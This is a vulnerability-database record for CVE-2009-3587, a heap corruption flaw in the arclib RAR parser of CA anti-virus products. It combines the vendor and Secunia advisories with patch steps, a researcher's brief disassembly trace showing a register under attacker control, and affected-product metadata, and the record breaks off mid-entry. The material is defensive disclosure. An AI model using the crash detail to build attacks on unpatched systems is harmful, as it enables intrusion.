Vulnerability from variot - Updated: 2024-05-18 22:06Unspecified vulnerability in the arclib component in the Anti-Virus engine in CA Anti-Virus for the Enterprise (formerly eTrust Antivirus) 7.1 through r8.1; Anti-Virus 2007 (v8) through 2009; eTrust EZ Antivirus r7.1; Internet Security Suite 2007 (v3) through Plus 2009; and other CA products allows remote attackers to cause a denial of service and possibly execute arbitrary code via a crafted RAR archive file that triggers heap corruption, a different vulnerability than CVE-2009-3588. This vulnerability CVE-2009-3588 Is a different vulnerability.Skillfully crafted by a third party RAR Service disruption via archive files (DoS) Could be put into a state or execute arbitrary code. Multiple Computer Associates products are prone to memory-corruption vulnerabilities that affect the Anti-Virus engine. An attacker can exploit these issues to execute arbitrary code in the context of the affected applications or cause denial-of-service conditions. The issues affect the Anti-Virus engine with versions prior to 'arclib' 8.1.4.0. Computer Associates is the world's leading security vendor, products include a variety of anti-virus software and backup recovery systems. CA20091008-01: Security Notice for CA Anti-Virus Engine
Issued: October 8, 2009
CA's support is alerting customers to multiple security risks associated with CA Anti-Virus Engine. Vulnerabilities exist in the arclib component that can allow a remote attacker to cause a denial of service, or to cause heap corruption and potentially further compromise a system. CA has issued fixes to address the vulnerabilities. An attacker can create a malformed RAR archive file that results in heap corruption and allows the attacker to cause a denial of service or possibly further compromise the system. An attacker can create a malformed RAR archive file that results in stack corruption and allows the attacker to cause a denial of service.
Risk Rating
Medium
Platform
Windows UNIX Linux Solaris Mac OS X Netware
Affected Products
CA Anti-Virus for the Enterprise (formerly eTrust Antivirus) 7.1 CA Anti-Virus for the Enterprise (formerly eTrust Antivirus) r8 CA Anti-Virus for the Enterprise (formerly eTrust Antivirus) r8.1 CA Anti-Virus 2007 (v8) CA Anti-Virus 2008 CA Anti-Virus 2009 CA Anti-Virus Plus 2009 eTrust EZ Antivirus r7.1 CA Internet Security Suite 2007 (v3) CA Internet Security Suite 2008 CA Internet Security Suite Plus 2008 CA Internet Security Suite Plus 2009 CA Threat Manager for the Enterprise (formerly eTrust Integrated Threat Management) r8 CA Threat Manager for the Enterprise (formerly eTrust Integrated Threat Management) 8.1 CA Threat Manager Total Defense CA Gateway Security r8.1 CA Protection Suites r2 CA Protection Suites r3 CA Protection Suites r3.1 CA Secure Content Manager (formerly eTrust Secure Content Manager) 1.1 CA Secure Content Manager (formerly eTrust Secure Content Manager) 8.0 CA Network and Systems Management (NSM) (formerly Unicenter Network and Systems Management) r3.0 CA Network and Systems Management (NSM) (formerly Unicenter Network and Systems Management) r3.1 CA Network and Systems Management (NSM) (formerly Unicenter Network and Systems Management) r11 CA Network and Systems Management (NSM) (formerly Unicenter Network and Systems Management) r11.1 CA ARCserve Backup r11.5 on Windows CA ARCserve Backup r12 on Windows CA ARCserve Backup r12.0 SP1 on Windows CA ARCserve Backup r12.0 SP 2 on Windows CA ARCserve Backup r12.5 on Windows CA ARCserve Backup r11.1 Linux CA ARCserve Backup r11.5 Linux CA ARCserve for Windows Client Agent CA ARCserve for Windows Server component CA eTrust Intrusion Detection 2.0 SP1 CA eTrust Intrusion Detection 3.0 CA eTrust Intrusion Detection 3.0 SP1 CA Common Services (CCS) r3.1 CA Common Services (CCS) r11 CA Common Services (CCS) r11.1 CA Anti-Virus SDK (formerly eTrust Anti-Virus SDK) CA Anti-Virus Gateway (formerly eTrust Antivirus Gateway) 7.1
Non-Affected Products
CA Anti-Virus engine with arclib version 8.1.4.0 or later installed
How to determine if the installation is affected
For products on Windows:
- Using Windows Explorer, locate the file "arclib.dll". By default, the file is located in the "C:\Program Files\CA\SharedComponents\ScanEngine" directory (*).
- Right click on the file and select Properties.
- Select the Version tab.
-
If the file version is earlier than indicated below, the installation is vulnerable.
File Name File Version arclib.dll 8.1.4.0
*For eTrust Intrusion Detection 2.0, the file is located in "Program Files\eTrust\Intrusion Detection\Common", and for eTrust Intrusion Detection 3.0 and 3.0 sp1, the file is located in "Program Files\CA\Intrusion Detection\Common".
For CA Anti-Virus r8.1 on non-Windows platforms:
Use the compver utility provided on the CD to determine the version of Arclib. If the version is less than 8.1.4.0, the installation is vulnerable.
Example compver utility output:
------------------------------------------------
COMPONENT NAME VERSION
------------------------------------------------
eTrust Antivirus Arclib Archive Library 8.1.4.0
... (followed by other components)
For reference, the following are file names for arclib on non-Windows operating systems:
Operating System File name
Solaris libarclib.so
Linux libarclib.so
Mac OS X arclib.bundle
Solution
CA released arclib 8.1.4.0 on August 12 2009. If your product is configured for automatic updates, you should already be protected, and you need to take no action. If your product is not configured for automatic updates, then you simply need to run the update utility included with your product.
CA Network and Systems Management (NSM) (formerly Unicenter Network and Systems Management) r3.0: apply fix # RO11964.
CA Network and Systems Management (NSM) (formerly Unicenter Network and Systems Management) r3.1: apply fix # RO11964.
CA Network and Systems Management (NSM) (formerly Unicenter Network and Systems Management) r11: apply fix # RO11964.
CA Network and Systems Management (NSM) (formerly Unicenter Network and Systems Management) r11.1: apply fix # RO11964.
CA Common Services (CCS) r3.1: apply fix # RO11954.
CA Anti-Virus for the Enterprise (formerly eTrust Antivirus) 7.1 32bit: apply fix # RO10663.
CA Anti-Virus for the Enterprise (formerly eTrust Antivirus) 7.1 IA64: apply fix # RO10664.
CA Anti-Virus for the Enterprise (formerly eTrust Antivirus) 7.1 AMD64: apply fix # RO10665.
CA Secure Content Manager (formerly eTrust Secure Content Manager) r1.1: apply fix # RO10999.
CA Secure Content Manager (formerly eTrust Secure Content Manager) r8.0: apply fix # RO10999.
CA Anti-Virus Gateway (formerly eTrust Antivirus Gateway) 7.1: apply fix # RO11000.
CA Gateway Security r8.1: RO10999.
CA ARCserve for Windows Server component installed on a 64 bit machine: apply fixes # RO10663 and RO10664 (IA64) or RO10665 (AMD64).
CA ARCserve for Windows Server component installed on a 32 bit machine: apply fix # RO10663.
CA ARCserve for Windows Client Agent installed on a 64 bit machine: apply fix # RO10664 (IA64) or RO10665 (AMD64).
CA ARCserve for Windows Client Agent installed on a 32 bit machine: apply fix # RO10663.
CA ARCserve for Linux Server r11.5: apply fix # RO10729.
CA ARCserve for Linux:
-
Download RO10729.tar.Z from RO10729 into a temporary location /tmp/RO10729
-
Uncompress and untar RO10729.tar.Z as follows: uncompress RO10729.tar.Z tar -xvf RO10729.tar The new "libarclib.so" will be extracted to /tmp/RO10729
-
Change the directory to $CAIGLBL0000/ino/config as follows: cd $CAIGLBL0000/ino/config
-
Rename "libarclib.so" to "libarclib.so.RO10729" as follows: mv libarclib.so libarclib.so.RO10729
-
Copy the new libarclib.so as follows: cp /tmp/RO10729/libarclib.so $CAIGLBL0000/ino/config/
-
chmod +x $CAIGLBL0000/ino/config/libarclib.so
-
Stop the common agent (caagent stop)
-
Change the directory to ARCserve common agent directory (typically /opt/CA/BABcmagt) cd /opt/CA/BABcmagt Note: To find out the agent home directory run the following command: dirname 'ls -l /usr/bin/caagent |cut -f2 -d">"'
-
Save a copy of libarclib.so cp -p libarclib.so libarclib.so.RO10729
-
Copy over the new libarclib.so as follows: cp $/tmp/RO10729/libarclib.so.
-
Start the common agent (caagent start)
-
Repeat steps (7-11) on all remote Linux client agents' installations.
-
rm -rf /tmp/RO10729
Workaround
Do not open email attachments or download files from untrusted sources.
If additional information is required, please contact CA Support at http://support.ca.com/.
If you discover a vulnerability in CA products, please report your findings to the CA Product Vulnerability Response Team. support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=177782
Regards, Ken Williams, Director ; 0xE2941985 CA Product Vulnerability Response Team
CA, 1 CA Plaza, Islandia, NY 11749
Contact http://www.ca.com/us/contact/ Legal Notice http://www.ca.com/us/legal/ Privacy Policy http://www.ca.com/us/privacy/ Copyright (c) 2009 CA. All rights reserved. ----------------------------------------------------------------------
Do you have VARM strategy implemented?
(Vulnerability Assessment Remediation Management)
If not, then implement it through the most reliable vulnerability intelligence source on the market.
Implement it through Secunia.
For more information visit: http://secunia.com/advisories/business_solutions/
Alternatively request a call from a Secunia representative today to discuss how we can help you with our capabilities contact us at: sales@secunia.com
TITLE: CA Anti-Virus Engine RAR Processing Two Vulnerabilities
SECUNIA ADVISORY ID: SA36976
VERIFY ADVISORY: http://secunia.com/advisories/36976/
DESCRIPTION: Two vulnerabilities have been reported in multiple CA products, which can be exploited by malicious people to cause a DoS (Denial of Service) or to potentially compromise a vulnerable system.
Successful exploitation may allow execution of arbitrary code.
Please see the vendor's advisory for detailed instructions on applying patches.
PROVIDED AND/OR DISCOVERED BY: The vendor credits Thierry Zoller.
ORIGINAL ADVISORY: CA20091008-01: https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=218878
About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
. Background ~~~~~~~~~~~~~ Quote: "CA is one of the world's largest IT management software providers. We serve more than 99% of Fortune 1000 companies, as well as government entities, educational institutions and thousands of other companies in diverse industries worldwide"
"CA Anti-Virus for the Enterprise is the next generation in comprehensive anti-virus security for business PCs, servers and PDAs. It combines proactive protection against malware with new, powerful management features that stop and remove malicious code before it enters your network, reducing system downtime"
II.
Attacker has control over EBX :
Basic Block: 6e4305b0 mov cl,byte ptr [ebx] Tainted Input Operands: ebx 6e4305b2 add edi,28h 6e4305b5 push edi 6e4305b6 lea edx,[esp+14h] 6e4305ba mov byte ptr [esp+14h],cl Tainted Input Operands: cl 6e4305be inc ebx Tainted Input Operands: ebx 6e4305bf push edx 6e4305c0 mov ecx,esi 6e4305c2 mov dword ptr [esp+1ch],ebx Tainted Input Operands: ebx 6e4305c6 call arclib!arctkopenarchive+0x283a0 (6e42f9f0)
III. Due to the nature of Anti-virus products, the attack vectors can be near endless. An attack could be done over the way of an E-mail message carrying an RAR attachment (of a file recognised as being RAR), USB, CD, Network data etc.
Please note that this is a general problem and not exclusive to Computer Associates.
IV. Disclosure timeline ~~~~~~~~~~~~~~~~~~~~~~~~~ DD.MM.YYYY 11.05.2009 - Reported CVE-2009-3587 03.06.2009 - Reported CVE-2009-3588 09.10.2009 - CA releases advisory https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=218878 13.10.2009 - G-SEC releases advisory
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200910-0352",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "anti-virus plus",
"scope": "eq",
"trust": 1.8,
"vendor": "ca",
"version": "2009"
},
{
"model": "protection suites",
"scope": "eq",
"trust": 1.6,
"vendor": "ca",
"version": "r3.1"
},
{
"model": "threat manager",
"scope": "eq",
"trust": 1.6,
"vendor": "ca",
"version": "r8"
},
{
"model": "threat manager",
"scope": "eq",
"trust": 1.6,
"vendor": "ca",
"version": "8.1"
},
{
"model": "protection suites",
"scope": "eq",
"trust": 1.6,
"vendor": "ca",
"version": "r2"
},
{
"model": "protection suites",
"scope": "eq",
"trust": 1.6,
"vendor": "ca",
"version": "r3"
},
{
"model": "internet security suite plus 2008",
"scope": null,
"trust": 1.4,
"vendor": "ca",
"version": null
},
{
"model": "internet security suite plus 2009",
"scope": null,
"trust": 1.4,
"vendor": "ca",
"version": null
},
{
"model": "threat manager total defense",
"scope": null,
"trust": 1.4,
"vendor": "ca",
"version": null
},
{
"model": "etrust anti-virus sdk",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "*"
},
{
"model": "network and systems management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "r3.0"
},
{
"model": "threat manager total defense",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "*"
},
{
"model": "etrust antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "7.1"
},
{
"model": "internet security suite",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "*"
},
{
"model": "anti-virus gateway",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "7.1"
},
{
"model": "etrust integrated threat management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "8.1"
},
{
"model": "unicenter network and systems management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "11"
},
{
"model": "unicenter network and systems management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.0"
},
{
"model": "arcserve backup",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "r11.5"
},
{
"model": "etrust intrusion detection",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.0"
},
{
"model": "etrust antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "8.1"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2008"
},
{
"model": "internet security suite 2008",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "*"
},
{
"model": "arcserve for windows client agent",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "*"
},
{
"model": "internet security suite plus 2008",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "*"
},
{
"model": "gateway security",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "r8.1"
},
{
"model": "secure content manager",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "1.1"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "2009"
},
{
"model": "etrust intrusion detection",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "2.0"
},
{
"model": "secure content manager",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "8.0"
},
{
"model": "common services",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "11"
},
{
"model": "etrust ez antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "r7.1"
},
{
"model": "network and systems management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "r11.1"
},
{
"model": "network and systems management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "r11"
},
{
"model": "internet security suite",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.0"
},
{
"model": "arcserve backup",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "r11.1"
},
{
"model": "etrust secure content manager",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "8.0"
},
{
"model": "anti-virus for the enterprise",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "r8"
},
{
"model": "unicenter network and systems management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "11.1"
},
{
"model": "etrust anti-virus gateway",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "7.1"
},
{
"model": "internet security suite plus 2009",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "*"
},
{
"model": "anti-virus for the enterprise",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "r8.1"
},
{
"model": "anti-virus sdk",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "*"
},
{
"model": "etrust antivirus",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "8"
},
{
"model": "anti-virus",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "2007"
},
{
"model": "network and systems management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "r3.1"
},
{
"model": "common services",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "3.1"
},
{
"model": "etrust secure content manager",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "1.1"
},
{
"model": "etrust intrusion detection",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "3.0"
},
{
"model": "common services",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "11.1"
},
{
"model": "arcserve for windows server component",
"scope": "eq",
"trust": 1.0,
"vendor": "ca",
"version": "*"
},
{
"model": "anti-virus for the enterprise",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "7.1"
},
{
"model": "unicenter network and systems management",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": "3.1"
},
{
"model": "anti-virus",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "anti-virus for the enterprise",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "anti-virus gateway",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "anti-virus sdk",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "arcserve backup",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "arcserve for windows client agent",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "arcserve for windows server component",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "common services",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "etrust intrusion detection",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "gateway security",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "internet security suite",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "network and systems management",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "protection suites",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "secure content manager",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "threat manager for the enterprise",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "etrust ez antivirus",
"scope": null,
"trust": 0.8,
"vendor": "ca",
"version": null
},
{
"model": "etrust integrated threat management",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "8.1"
},
{
"model": "secure content manager",
"scope": "eq",
"trust": 0.6,
"vendor": "ca",
"version": "1.1"
},
{
"model": "associates unicenter network and systems management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.1"
},
{
"model": "associates unicenter network and systems management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.0"
},
{
"model": "associates unicenter network and systems management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates unicenter network and systems management",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11"
},
{
"model": "associates threat manager total defense",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "0"
},
{
"model": "associates threat manager for the enterprise r8.1",
"scope": null,
"trust": 0.3,
"vendor": "computer",
"version": null
},
{
"model": "associates threat manager for the enterprise r8",
"scope": null,
"trust": 0.3,
"vendor": "computer",
"version": null
},
{
"model": "associates protection suites r2",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "0"
},
{
"model": "associates protection suites r3",
"scope": null,
"trust": 0.3,
"vendor": "computer",
"version": null
},
{
"model": "associates protection suites",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.1"
},
{
"model": "associates internet security suite plus",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "20090"
},
{
"model": "associates internet security suite plus",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "20080"
},
{
"model": "associates internet security suite",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "20080"
},
{
"model": "associates internet security suite",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "20073.0"
},
{
"model": "associates gateway security",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.1"
},
{
"model": "associates etrust secure content manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "8.0"
},
{
"model": "associates etrust secure content manager",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "1.1"
},
{
"model": "associates etrust intrusion detection sp",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.01"
},
{
"model": "associates etrust intrusion detection",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.0"
},
{
"model": "associates etrust intrusion detection sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2.0.0"
},
{
"model": "associates etrust ez antivirus",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7.1"
},
{
"model": "associates common services r11.1",
"scope": null,
"trust": 0.3,
"vendor": "computer",
"version": null
},
{
"model": "associates common services r11",
"scope": null,
"trust": 0.3,
"vendor": "computer",
"version": null
},
{
"model": "associates common services",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "3.1"
},
{
"model": "associates brightstor arcserve backup for windows",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates brightstor arcserve backup for windows",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.5"
},
{
"model": "associates brightstor arcserve backup for windows",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "12.5"
},
{
"model": "associates brightstor arcserve backup for windows",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "12.0"
},
{
"model": "associates brightstor arcserve backup r12.0 windows sp1",
"scope": null,
"trust": 0.3,
"vendor": "computer",
"version": null
},
{
"model": "associates arcserve backup for linux sp3",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.5"
},
{
"model": "associates arcserve backup for linux sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.5"
},
{
"model": "associates arcserve backup for linux sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.5"
},
{
"model": "associates arcserve backup for linux ga",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.5"
},
{
"model": "associates arcserve backup for linux sp3",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates arcserve backup for linux sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates arcserve backup for linux sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates arcserve backup for linux ga",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "11.1"
},
{
"model": "associates anti-virus sdk",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "0"
},
{
"model": "associates anti-virus gateway",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7.1"
},
{
"model": "associates anti-virus for the enterprise r8.1",
"scope": null,
"trust": 0.3,
"vendor": "computer",
"version": null
},
{
"model": "associates anti-virus for the enterprise r8",
"scope": null,
"trust": 0.3,
"vendor": "computer",
"version": null
},
{
"model": "associates anti-virus for the enterprise",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "7.1"
},
{
"model": "associates anti-virus plus",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "20090"
},
{
"model": "associates anti-virus",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "20090"
},
{
"model": "associates anti-virus",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "20078"
},
{
"model": "associates anti-virus",
"scope": "eq",
"trust": 0.3,
"vendor": "computer",
"version": "2008"
}
],
"sources": [
{
"db": "BID",
"id": "36653"
},
{
"db": "JVNDB",
"id": "JVNDB-2009-002628"
},
{
"db": "CNNVD",
"id": "CNNVD-200910-199"
},
{
"db": "NVD",
"id": "CVE-2009-3587"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:ca:internet_security_suite_plus_2009:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:gateway_security:r8.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:common_services:3.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:etrust_secure_content_manager:8.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:etrust_anti-virus_sdk:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:anti-virus_for_the_enterprise:r8.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:arcserve_for_windows_server_component:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:etrust_intrusion_detection:2.0:sp1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:threat_manager:8.1:*:enterprise:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:protection_suites:r3:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:etrust_ez_antivirus:r7.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:internet_security_suite_2008:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:anti-virus:2009:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:etrust_intrusion_detection:3.0:sp1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:anti-virus_plus:2009:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:protection_suites:r3.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:anti-virus_gateway:7.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:threat_manager:r8:*:enterprise:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:etrust_anti-virus_gateway:7.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:arcserve_for_windows_client_agent:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:arcserve_backup:r11.5:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:threat_manager_total_defense:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:internet_security_suite_plus_2008:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:ca:protection_suites:r2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:anti-virus:2008:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:anti-virus:2007:8:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:anti-virus_sdk:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:broadcom:anti-virus_for_the_enterprise:r8:*:*:*:*:*:*:*",
